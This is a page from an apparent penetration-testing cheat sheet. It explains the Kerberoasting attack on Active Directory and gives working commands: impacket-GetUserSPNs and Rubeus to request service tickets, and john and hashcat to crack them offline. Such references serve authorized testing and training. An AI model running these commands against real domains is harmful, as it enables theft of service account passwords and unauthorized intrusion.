SecuriTreeHome

SecuriTree

  • Windows Security
    • Post-exploitation
      • Network Tunneling
        (Ligolo-ng, Chisel)
      • Reverse Shell
      • System Manipulation
      • File Transfer
    • Lateral Movement
      • Common Problems
        • Double Hop
        • Remote UAC
      • Techniques
        • Access Token Manipulation
          (RunAs, RunasCs)
        • Pass-the-Ticket (Kerberos)
          (Rubeus, getTGT)
      • Technologies
        • MS-RPC
          • MS-DCOM
          • MS-RRP
          • MS-SCMR
            (PsExec, SmbExec, ScExec)
          • MS-TSCH
          • MS-WMI
            (WmiExec)
        • RDP
        • WinRM
          (winrs, PS Remoting)
    • Domain Privesc
      • ACL Abuse
      • AD Delegation Abuse
        • Constrained Delegation
        • Resource-Based Constrained Delegation
        • Unconstrained Delegation
      • AS-Rep Roasting
      • Certificate Service Abuse
      • Credentials Dump
        • DCSync
        • LSASS Memory
        • Local SAM
        • Windows Vault
      • Group Policies
      • Information to steal
        (files, logs, processes, ...)
      • Kerberoasting
      • Local Admin Hunting
      • MSSQL Abuse
      • NTLM Hash Stealing
      • NTLM Relay
      • Password Spraying
      • RDP Hijacking
      • Tasks and Services Abuse
    • Reconnaissance
      • Active Directory
      • DNS
      • LDAP
      • NetBIOS
      • NFS
      • Port Scanning
      • RPC
      • SMB
      • SMTP
      • SNMP
#Windows Security #Domain Privesc #Kerberoasting

Kerberoasting

When a user wants to access a resource hosted by a Service Principal Name (SPN), the client requests a TGS (service ticket) that is generated by the DC. The TGS is then decrypted and validated by the application server, since it is encrypted via the password hash of the SPN. When requesting the TGS from the DC, no checks are performed to confirm whether the user has any permissions to access the service. These checks are performed as a second step only when connecting to the service itself. This means that we are able to request for TGS to any domain service (SPN), regardless of the actual permissions.

The TGS is encrypted using the SPN's password hash. Having TGS, we can try to crack it offline and recover the service account password. This is the Kerberoasting attack.

NOTE: Domain names should be kept in FQDN format!

Linux:

# Get list of kerberoastable users from DC
impacket-GetUserSPNs $domain_fqdn/$user:$pass -dc-ip $dc_ip
 
# Request TGS for kerberoastable users
impacket-GetUserSPNs $domain_fqdn/$user:$pass -dc-ip $dc_ip -request -outputfile $file
 
# Crack TGS using John
john --format=krb5tgs --wordlist=$wordlist $tgs_file
 
# Crack TGS using HashCat
hashcat -m 13100 $file $dictionary

IMPORTANT: If impacket-GetUserSPNs throws the error "KRB_AP_ERR_SKEW(Clock skew too great)" the synchronization of the time of the Kali machine with the DC is required. We can use ntpdate or rdate to do so.

Windows:

# Get kerberoastable users and save to file
.\Rubeus.exe kerberoast /outfile:$file

Children

Kerberoasting